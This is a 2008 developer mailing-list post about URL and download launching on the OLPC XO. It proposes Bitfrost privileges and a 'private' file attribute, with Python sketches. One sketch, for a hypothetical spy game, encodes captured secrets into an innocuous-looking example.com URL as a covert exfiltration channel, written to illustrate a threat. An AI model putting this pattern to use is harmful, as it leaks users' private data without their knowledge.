Security for launching from URL
Jameson "Chema" Quinn
jquinn at cs.oberlin.edu
Sat Jul 5 09:27:41 EDT 2008
On Fri, Jul 4, 2008 at 4:42 PM, Ivan Krstić <krstic at solarsail.hcs.harvard.edu> wrote:
> On Jul 4, 2008, at 1:37 PM, Edward Cherlin wrote:
> > My guess is that there is a way to secure the
> > process, but it might require some extra effort beyond a software fix,
> > like teachers whitelisting URLs for lessons. Or perhaps just
> > whitelisting our Moodle instances. Signed lesson plans? At any rate,
> > _not_ allowing random outside URLs to launch local activities and give
> > them scripts to run.
>
> Mainstream desktop OSes allow installed applications to register
> themselves as handlers for particular URI schemes. The applications
> are called when a URI under their handled scheme is invoked (such as
> by clicking within a browser), and are passed the entirety of the
> invoking URI, but no other information.
>
> Assuming the invoked application treats the URI with no additional
> trust, just as if it were entered from within the application, there
> is no inherent security vulnerability to speak of. Issues would arise,
> for example, if the application had a code path that performed
> filtering or applied other restrictions to the URIs it used, but
> failed to invoke that code path when a URI was passed from the OS
> rather than being entered from within the application.
>
> That said, the URI handler approach should be used sparingly. It's one
> thing to allow starting an audio player by clicking an MP3 link in the
> browser, and another to arbitrarily execute code (e.g. through an
> execution environment such as Pippy or eToys) from a web page with a
> single click. While Bitfrost is designed to mitigate the side effects
> of arbitrary code execution, it's very unwise to make it trivial for
> the user to trigger such execution unknowingly.
>
> --
> Ivan Krstić <krstic at solarsail.hcs.harvard.edu> | http://radian.org
>
I do not think that URIs pointing to the local machine are what is needed
here. What about simply downloading/opening files? I click on a link; it
downloads the file; when the download is complete I get an alert asking
whether I want to see it in the Journal; I say yes and am taken to the
Journal, where I open it. Later, a UI improvement lets me open it directly
from the (trusted) alert (although this means running the alert from a
non-activity context, and may put impossible burdens on our nonexistent X
security).

Security-wise, how is this different from the URI-based scheme? Only in that
it does not require the activity to be pre-registered to accept URIs.
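A rough sketch of what the Browse end of that flow might look like, assuming
the sugar.datastore API we have today (the alert and Journal plumbing is only
hinted at in comments, and the 'origin' field is made up for illustration):

    # Hypothetical sketch: Browse saves a completed download into the Journal
    # instead of handing a URI straight to another activity.
    from sugar.datastore import datastore

    def save_download_to_journal(local_path, title, mime_type):
        entry = datastore.create()
        entry.metadata['title'] = title
        entry.metadata['mime_type'] = mime_type
        # Invented provenance marker, so receiving activities can treat the
        # data as nonlocal, untrusted input.
        entry.metadata['origin'] = 'download'
        entry.file_path = local_path
        datastore.write(entry)
        # Here Browse would raise its "see it in the Journal?" alert; the
        # user then opens the entry from the Journal, not from the web page.
        return entry.object_id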
There are two security holes to worry about here: incoming data that is
executed without sufficient Bitfrost protection, and outgoing private data -
that is, data that originates in an activity without P_NETWORK (a protection
which is, of course, unimplemented right now, but still worth worrying about)
and gets handed to an activity with P_NETWORK. One at a time:
1. Incoming data. Imagine a future version of Terminal that saves its
history files in the Journal and then lets you open it with a given history
and use the up arrow to rerun commands. Terminal has no Bitfrost protection,
and so should absolutely refuse to open nonlocal histories. (In the URI
scheme, this just means not registering Terminal as a URI handler. However,
it is not clear how the URI handler registry interacts with Bitfrost. I think
my solution below is better.)
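As a sketch of what "refuse to open nonlocal histories" could mean in
practice (the bundle id is approximate, and the 'origin' field is the
invented marker from the Browse sketch above):

    # Hypothetical check inside a future Terminal's read_file(): refuse any
    # Journal entry that this Terminal did not create itself.
    def should_open_history(metadata, my_bundle_id='org.laptop.Terminal'):
        # 'activity' is the Journal field naming the creating activity;
        # 'origin' flags downloaded, nonlocal data.
        if metadata.get('origin') == 'download':
            return False
        return metadata.get('activity') == my_bundle_id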
2. Outgoing data. Imagine EvilSpyGame, which does voice recognition for the
name of the illegal opposition party and then encodes this info into an
innocuous-looking URL. When you click on the URL, your Browse rats you out
to the secret police. (The obvious limitation here is the small amount of
data which fits into a URL, but that limitation is not part of Bitfrost and
so cannot be trusted - I remember the "upskirt security professional" who
came trolling #olpc a while back; if photos could be leaked, there is a real
danger.)
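To make the channel concrete, here is a minimal sketch of how EvilSpyGame
might smuggle what it heard into a harmless-looking link for Browse to fetch
(Python 2, as shipped on the XO; the host name and query parameter are of
course invented):

    # Covert-channel sketch: encode captured data into an innocuous-looking
    # URL. The leak happens the moment the user clicks the link in Browse.
    import base64
    import urllib

    def build_leak_url(secret_text):
        payload = base64.urlsafe_b64encode(secret_text)
        # Looks like an ordinary "session id" query parameter.
        return 'http://example.com/highscores?session=' + urllib.quote(payload)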
One scheme which would deal with both of these issues is a "private"
metadata attribute on files. Say there were three new Bitfrost privileges,
P_OPEN_PRIVATE, P_OPEN_NONPRIVATE, and P_SAVE_NONPRIVATE (in an actual
implementation, some of these privileges might be inferred from existing
ones). P_OPEN_PRIVATE would be incompatible with P_NETWORK (except through
user intervention); P_SAVE_NONPRIVATE would be incompatible with P_MIC_CAM;
and P_OPEN_NONPRIVATE would be available to all activities, but activities
which give excessive code-execution power to "data" (e.g., my hypothetical
future Terminal, above) could refuse this privilege at will.
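The incompatibility rules might be expressed roughly like this (P_NETWORK
and P_MIC_CAM are existing Bitfrost protections; the P_OPEN_*/P_SAVE_* names
are only my proposal, nothing implemented):

    # Sketch of the proposed incompatibility rules.
    INCOMPATIBLE = [
        ('P_OPEN_PRIVATE', 'P_NETWORK'),     # reading private data vs. network access
        ('P_SAVE_NONPRIVATE', 'P_MIC_CAM'),  # saving non-private files vs. mic/camera
    ]

    def conflicts(requested_privileges):
        """Return the privilege pairs that may not be combined without
        explicit user intervention."""
        requested = set(requested_privileges)
        return [pair for pair in INCOMPATIBLE
                if pair[0] in requested and pair[1] in requested]

    # P_OPEN_NONPRIVATE never appears in the table - it is available to all
    # activities, and ones like the hypothetical Terminal simply decline to
    # request it.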
This scheme, at a first approximation, resolves the two issues I mentioned.
However, the UI for setting the private attribute on a file becomes
important. If it is too easy to change the private attribute without
realizing the consequences, my scheme becomes useless; yet trying to
handcuff the user, or presenting "Are you sure you want to do that dangerous
thing?" dialogs, may not be acceptable solutions either.
Jameson
P.S.
The "private" attribute would obviously have consequences for encryption,
too. It might have three values - "private", "normal", and "published".
"private" and "normal" would be encrypted on backup; "published" would be
world-browseable on the school server. But this is a separate issue.
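For concreteness, the three-way split might map onto opening, backup, and
publishing behaviour roughly like this (pure sketch of the proposal; the
P_OPEN_* names are from above):

    # Proposed semantics of the three-valued "private" attribute.
    PRIVACY_POLICY = {
        'private':   {'open_requires': 'P_OPEN_PRIVATE',
                      'encrypt_on_backup': True,  'world_browseable': False},
        'normal':    {'open_requires': 'P_OPEN_NONPRIVATE',
                      'encrypt_on_backup': True,  'world_browseable': False},
        'published': {'open_requires': 'P_OPEN_NONPRIVATE',
                      'encrypt_on_backup': False, 'world_browseable': True},
    }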